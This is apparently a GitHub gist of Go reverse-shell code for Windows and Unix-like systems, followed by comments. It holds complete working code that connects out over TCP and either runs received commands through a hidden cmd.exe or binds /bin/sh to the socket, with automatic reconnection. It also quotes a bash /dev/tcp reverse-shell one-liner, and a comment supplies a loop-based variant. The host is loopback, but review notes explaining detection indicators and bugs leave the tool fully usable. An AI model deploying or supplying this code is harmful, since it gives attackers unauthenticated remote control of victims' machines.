Golang reverse shell
// +build windows | |
// Reverse Windows CMD | |
// Test with nc -lvvp 6666 | |
package main | |
import ( | |
"bufio" | |
"net" | |
"os/exec" | |
"syscall" | |
"time" | |
) | |
// main starts the connect-back routine against the hard-coded loopback
// address 127.0.0.1:6666, the same port as the local netcat listener named
// in the file header. Nothing is read from flags or the environment.
func main() {
	const target = "127.0.0.1:6666"
	reverse(target)
}
// reverse opens a plain TCP connection to host, then treats every
// newline-terminated line received on it as a command: the line is run
// through "cmd /C" with the console window hidden, and the combined
// stdout/stderr is written back to the peer.
//
// Review notes (defensive reading of this block):
//   - The channel is unauthenticated and unencrypted: whatever answers on
//     host can run commands with the privileges of this process, and both
//     commands and output cross the network in cleartext.
//   - What an endpoint sees is one process that holds an outbound TCP
//     connection and repeatedly spawns cmd.exe children with /C and a
//     hidden window.
//   - Reconnection is done by recursion, so every dropped connection or
//     failed dial adds a stack frame that is never released.
//   - Errors from running the command and from writing the reply are
//     discarded.
func reverse(host string) {
	conn, dialErr := net.Dial("tcp", host)
	if dialErr != nil {
		if conn != nil {
			conn.Close()
		}
		// Back off for a minute, then retry by calling ourselves again.
		time.Sleep(time.Minute)
		reverse(host)
		// NOTE(review): if that call ever returned, execution would fall
		// through to the reader below with conn still nil.
	}

	lines := bufio.NewReader(conn)
	for {
		line, readErr := lines.ReadString('\n')
		if readErr == nil {
			proc := exec.Command("cmd", "/C", line)
			proc.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}
			output, _ := proc.CombinedOutput()
			conn.Write(output)
			continue
		}

		// Read failed (peer gone or connection reset): drop the socket and
		// start over with a fresh dial.
		conn.Close()
		reverse(host)
		return
	}
}
//go:generate sh -c "CGO_ENABLED=0 go build -installsuffix netgo -tags netgo -ldflags \"-s -w -extldflags '-static'\" -o $DOLLAR(basename ${GOFILE} .go)`go env GOEXE` ${GOFILE}" | |
// +build !windows | |
// Reverse Shell in Go | |
// http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet | |
// Test with nc -lvvp 6666 | |
package main | |
import ( | |
"net" | |
"os/exec" | |
"time" | |
) | |
// main starts the connect-back routine against the hard-coded loopback
// address 127.0.0.1:6666, the same port as the local netcat listener named
// in the file header. Nothing is read from flags or the environment.
func main() {
	const target = "127.0.0.1:6666"
	reverse(target)
}
// reverse opens a plain TCP connection to host and runs /bin/sh with its
// stdin, stdout and stderr all attached to that connection. When the shell
// exits, the connection is closed and the function calls itself to
// reconnect.
//
// The author's shell equivalent, kept from the original comment:
//
//	bash -i >& /dev/tcp/localhost/6666 0>&1
//
// Review notes (defensive reading of this block):
//   - The channel is unauthenticated and unencrypted: whatever answers on
//     host gets an interactive shell with the privileges of this process.
//   - What an endpoint sees is a /bin/sh process whose three standard
//     streams are a network socket rather than a terminal or pipe.
//   - Reconnection is done by recursion, so every session and every failed
//     dial adds a stack frame that is never released.
//   - The error returned by Run is discarded.
func reverse(host string) {
	conn, dialErr := net.Dial("tcp", host)
	if dialErr != nil {
		if conn != nil {
			conn.Close()
		}
		// Back off for a minute, then retry by calling ourselves again.
		time.Sleep(time.Minute)
		reverse(host)
		// NOTE(review): if that call ever returned, execution would fall
		// through to the shell below with conn still nil.
	}

	shell := exec.Command("/bin/sh")
	shell.Stdin = conn
	shell.Stdout = conn
	shell.Stderr = conn
	shell.Run()

	conn.Close()
	reverse(host)
}
Author
yougg
commented
Aug 21, 2020
- reverse shell over http/socks proxy
Line 34 in reversesh.go uses infinite recursion: reverse(host). This will eventually put enough function calls on the stack to crash the program, because it holds too many return pointers. (The program keeps a pointer to where it should go back once each function call is done, which never happens, so the stack floods someday.)
Better to remove that line and just wrap everything inside the reverse function in a regular infinite for loop, like this:
// reverse is the commenter's proposed variant: the dial / run-shell / close
// sequence sits inside an infinite for loop, so a normal shell exit goes
// around the loop and redials instead of making a recursive call.
//
// NOTE(review): the dial-failure branch below still calls reverse(host), so
// the recursion described in the comment remains on that path; and if that
// call ever returned, the loop body would continue with c == nil.
func reverse(host string) {
	for {
		c, err := net.Dial("tcp", host)
		if nil != err {
			if nil != c {
				c.Close()
			}
			// Wait a minute before retrying; the retry itself is still recursive.
			time.Sleep(time.Minute)
			reverse(host)
		}
		// /bin/sh runs with all three standard streams bound to the TCP
		// connection; the error returned by Run is ignored.
		cmd := exec.Command("/bin/sh")
		cmd.Stdin, cmd.Stdout, cmd.Stderr = c, c, c
		cmd.Run()
		c.Close()
	}
}